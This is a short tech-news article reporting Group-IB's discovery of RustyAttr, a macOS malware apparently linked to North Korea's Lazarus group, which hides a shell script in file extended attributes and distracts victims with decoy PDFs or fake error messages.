This cunning new malware goes after macOS users with a slew of tricks
- Security researchers from Group-IB discover a unique new piece of malware
- It exploits extended attributes for macOS files to implement the payload
- The malware was most likely built by North Korean state-sponsored actors
Cybersecurity researchers have encountered yet another malware variant for macOS that was likely built by North Korea’s infamous Lazarus group.
Group-IB’s report concerns the discovery of RustyAttr, a brand new piece of macOS malware built using the Tauri framework. T
The malware was not flagged on VirusTotal and was at some point signed with a legitimate Apple developer ID. The ID has now been withdrawn.
Extensive attributes
Days before, Jamf researchers found something similar: a seemingly benign app on VirusTotal, built with Flutter, that served as a backdoor for macOS victims.
In both cases, the malware used new obfuscation methods but was not yet fully operational, leading researchers to believe they were just experiments while crooks looked for new ways to hide the infection.
RustyAttr was found to be abusing extended attributes for macOS, the researchers claim.
Extended attributes (xattrs) are a feature that allows files and folders to store additional metadata beyond standard attributes such as name, size, and permissions. They are used for a variety of things, from storing security-related information to tagging files with specific metadata and enabling compatibility with other file systems. In this case, the EA name was “test” and contained a shell script.
When the malware runs, it loads a website with a piece of JavaScript. This JavaScript, called preload.js, pulls content from “test”, which appears to be a location. This location is then sent to the ‘run_command’ function, where the shell script executes it.
While the process is in progress, the victim is tricked with a decoy PDF file or a fake error message that appears in the foreground.
RustyAttr was most likely built by Lazarus, the researchers said, although since no casualties have been reported, they cannot be absolutely certain. However, they believe the malware is built to test new delivery and obfuscation methods on macOS devices.
Via BleepingComputer